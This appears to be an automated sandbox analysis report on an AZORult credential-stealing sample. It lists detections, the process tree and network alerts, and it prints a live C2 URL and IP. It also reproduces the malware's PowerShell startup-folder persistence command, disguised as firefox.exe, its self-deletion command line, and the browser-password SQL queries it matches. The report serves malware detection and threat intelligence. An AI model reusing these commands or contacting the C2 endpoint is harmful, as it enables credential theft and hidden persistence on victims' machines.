Edit tour

Windows Analysis Report
jd4t3R7hOq.exe

Overview

General Information

Sample name:	jd4t3R7hOq.exe renamed because original name is a hash value
Original sample name:	83eaae959cb35cd1d132562c7d49285abedce511c9f28244894aba725ebffe58.exe
Analysis ID:	1587904
MD5:	74039ad774774d76dba815ff486bbd03
SHA1:	922749d681acc93eba5c94dabef3dc4d999b0c59
SHA256:	83eaae959cb35cd1d132562c7d49285abedce511c9f28244894aba725ebffe58
Tags:	AZORultexeuser-adrian__luca
Infos:

Detection

Azorult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Copy file to startup via Powershell

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Azorult

Yara detected Azorult Info Stealer

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Drops PE files to the startup folder

Drops executable to a common third party application directory

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Powershell drops PE file

Self deletion via cmd or bat file

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

jd4t3R7hOq.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\jd4t3R7hOq.exe" MD5: 74039AD774774D76DBA815FF486BBD03)

powershell.exe (PID: 7672 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jd4t3R7hOq.exe (PID: 7816 cmdline: "C:\Users\user\Desktop\jd4t3R7hOq.exe" MD5: 74039AD774774D76DBA815FF486BBD03)

cmd.exe (PID: 8112 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "jd4t3R7hOq.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 8188 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

svchost.exe (PID: 7848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

firefox.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe" MD5: 74039AD774774D76DBA815FF486BBD03)

powershell.exe (PID: 6912 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 4900 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe" MD5: 74039AD774774D76DBA815FF486BBD03)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Azorult	AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.	The Gorgon Group	http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://any.run/cybersecurity-blog/azorult-malware-analysis/ https://asec.ahnlab.com/en/26517/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://ls14.icu/HK341/index.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd778:$a2: %APPDATA%\.purple\accounts.xml 0xdec0:$a3: %TEMP%\curbuf.dat 0x1a1d4:$a4: PasswordsList.txt 0x151d8:$a5: Software\Valve\Steam
00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000007.00000002.1424878829.00000000030C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0000000B.00000002.2552789436.0000000004CD0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x46581:$x1: In$J$ct0r
00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0xe6e60:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x102e90:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xda188:$a2: %APPDATA%\.purple\accounts.xml 0xf61b8:$a2: %APPDATA%\.purple\accounts.xml 0x111dd8:$a2: %APPDATA%\.purple\accounts.xml 0xda8d0:$a3: %TEMP%\curbuf.dat 0xf6900:$a3: %TEMP%\curbuf.dat 0x112520:$a3: %TEMP%\curbuf.dat 0xe6be4:$a4: PasswordsList.txt 0x102c14:$a4: PasswordsList.txt 0xe1be8:$a5: Software\Valve\Steam 0xfdc18:$a5: Software\Valve\Steam 0x119838:$a5: Software\Valve\Steam
00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0xe5028:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xe5688:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x101058:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1016b8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x11cc78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x11d2d8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xe6d70:$v2: http://ip-api.com/json 0x102da0:$v2: http://ip-api.com/json 0xe59e2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34 0x101a12:$v3: C6 07 1E C6 47 01 15 C6 47 02 34 0x11d632:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000007.00000002.1429821413.0000000004210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jd4t3R7hOq.exe PID: 7572	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: jd4t3R7hOq.exe PID: 7572	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Process Memory Space: jd4t3R7hOq.exe PID: 7572	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: jd4t3R7hOq.exe PID: 7816	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: jd4t3R7hOq.exe PID: 7816	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Process Memory Space: jd4t3R7hOq.exe PID: 7816	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: firefox.exe PID: 8120	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.firefox.exe.4cd0000.3.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x46581:$x1: In$J$ct0r
7.2.jd4t3R7hOq.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
7.2.jd4t3R7hOq.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
7.2.jd4t3R7hOq.exe.400000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
7.2.jd4t3R7hOq.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
7.2.jd4t3R7hOq.exe.400000.0.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
7.2.jd4t3R7hOq.exe.400000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
7.2.jd4t3R7hOq.exe.400000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
7.2.jd4t3R7hOq.exe.400000.0.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd778:$a2: %APPDATA%\.purple\accounts.xml 0xdec0:$a3: %TEMP%\curbuf.dat 0x1a1d4:$a4: PasswordsList.txt 0x151d8:$a5: Software\Valve\Steam
7.2.jd4t3R7hOq.exe.400000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
7.2.jd4t3R7hOq.exe.400000.0.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
11.2.firefox.exe.4cd0000.3.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x44781:$x1: In$J$ct0r
3.2.jd4t3R7hOq.exe.43f3b70.2.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x44781:$x1: In$J$ct0r
3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x9c2f0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xb8320:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x8f618:$a2: %APPDATA%\.purple\accounts.xml 0xab648:$a2: %APPDATA%\.purple\accounts.xml 0xc7268:$a2: %APPDATA%\.purple\accounts.xml 0x8fd60:$a3: %TEMP%\curbuf.dat 0xabd90:$a3: %TEMP%\curbuf.dat 0xc79b0:$a3: %TEMP%\curbuf.dat 0x9c074:$a4: PasswordsList.txt 0xb80a4:$a4: PasswordsList.txt 0x97078:$a5: Software\Valve\Steam 0xb30a8:$a5: Software\Valve\Steam 0xcecc8:$a5: Software\Valve\Steam
3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x9a718:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0xb6748:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0xd2368:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x94b4c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") 0xb0b7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") 0xcc79c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x9a4b8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x9ab18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xb64e8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xb6b48:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xd2108:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xd2768:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x9c200:$v2: http://ip-api.com/json 0xb8230:$v2: http://ip-api.com/json 0x9ae72:$v3: C6 07 1E C6 47 01 15 C6 47 02 34 0xb6ea2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34 0xd2ac2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x46581:$x1: In$J$ct0r
3.2.jd4t3R7hOq.exe.3554ea0.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20a4:$x1: In$J$ct0r 0xa2dc0:$a1: WriteProcessMemory 0xa2e4c:$a1: WriteProcessMemory 0xa2f20:$a4: VirtualAllocEx 0xa3144:$a4: VirtualAllocEx 0xa31c4:$a4: VirtualAllocEx
3.2.jd4t3R7hOq.exe.3552660.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa48e4:$x1: In$J$ct0r 0xa5600:$a1: WriteProcessMemory 0xa568c:$a1: WriteProcessMemory 0xa5760:$a4: VirtualAllocEx 0xa5984:$a4: VirtualAllocEx 0xa5a04:$a4: VirtualAllocEx
11.2.firefox.exe.26a5cfc.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20a4:$x1: In$J$ct0r 0xa2e28:$a1: WriteProcessMemory 0xa2eb4:$a1: WriteProcessMemory 0xa2f88:$a4: VirtualAllocEx 0xa31ac:$a4: VirtualAllocEx 0xa322c:$a4: VirtualAllocEx
11.2.firefox.exe.26a34bc.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa48e4:$x1: In$J$ct0r 0xa5668:$a1: WriteProcessMemory 0xa56f4:$a1: WriteProcessMemory 0xa57c8:$a4: VirtualAllocEx 0xa59ec:$a4: VirtualAllocEx 0xa5a6c:$a4: VirtualAllocEx
7.2.jd4t3R7hOq.exe.46644cd.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jd4t3R7hOq.exe.46644cd.5.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x426bdb:$string1: SELECT origin_url, username_value, password_value FROM logins 0x42ad26:$string1: SELECT origin_url, username_value, password_value FROM logins 0x29b4f1:$string2: API call with %s database connection pointer 0x29c125:$string3: os_win.c:%d: (%lu) %s(%s) - %s
7.2.jd4t3R7hOq.exe.4668c37.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jd4t3R7hOq.exe.4668c37.4.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x422471:$string1: SELECT origin_url, username_value, password_value FROM logins 0x4265bc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x296d87:$string2: API call with %s database connection pointer 0x2979bb:$string3: os_win.c:%d: (%lu) %s(%s) - %s
7.2.jd4t3R7hOq.exe.466d39f.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jd4t3R7hOq.exe.466d39f.6.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x41dd09:$string1: SELECT origin_url, username_value, password_value FROM logins 0x421e54:$string1: SELECT origin_url, username_value, password_value FROM logins 0x29261f:$string2: API call with %s database connection pointer 0x293253:$string3: os_win.c:%d: (%lu) %s(%s) - %s
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jd4t3R7hOq.exe", ParentImage: C:\Users\user\Desktop\jd4t3R7hOq.exe, ParentProcessId: 7572, ParentProcessName: jd4t3R7hOq.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', ProcessId: 7672, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7672, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7672, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jd4t3R7hOq.exe", ParentImage: C:\Users\user\Desktop\jd4t3R7hOq.exe, ParentProcessId: 7572, ParentProcessName: jd4t3R7hOq.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', ProcessId: 7672, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7848, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Author: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jd4t3R7hOq.exe", ParentImage: C:\Users\user\Desktop\jd4t3R7hOq.exe, ParentProcessId: 7572, ParentProcessName: jd4t3R7hOq.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe', ProcessId: 7672, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE AZORult v3.3 Server Response M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:12:28.204288+0100	2029137	1	Malware Command and Control Activity Detected	104.21.75.48	80	192.168.2.11	49726	TCP

ET MALWARE Win32/AZORult V3.3 Client Checkin M14

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:12:27.962082+0100	2029467	1	Malware Command and Control Activity Detected	192.168.2.11	49726	104.21.75.48	80	TCP
2025-01-10T19:12:36.052530+0100	2029467	1	Malware Command and Control Activity Detected	192.168.2.11	49767	104.21.75.48	80	TCP
2025-01-10T19:12:41.007516+0100	2029467	1	Malware Command and Control Activity Detected	192.168.2.11	49807	104.21.75.48	80	TCP

ETPRO MALWARE AZORult CnC Beacon M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:12:27.962082+0100	2810276	1	Malware Command and Control Activity Detected	192.168.2.11	49726	104.21.75.48	80	TCP
2025-01-10T19:12:41.007516+0100	2810276	1	Malware Command and Control Activity Detected	192.168.2.11	49807	104.21.75.48	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: jd4t3R7hOq.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ls14.icu/HK341/index.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 7.2.jd4t3R7hOq.exe.400000.0.unpack

Malware Configuration Extractor: Azorult {"C2 url": "http://ls14.icu/HK341/index.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: jd4t3R7hOq.exe	Virustotal: Detection: 77%			Perma Link
Source: jd4t3R7hOq.exe	ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: jd4t3R7hOq.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_004094C4 CryptUnprotectData,LocalFree,

7_2_004094C4

Source: jd4t3R7hOq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: jd4t3R7hOq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.7.dr
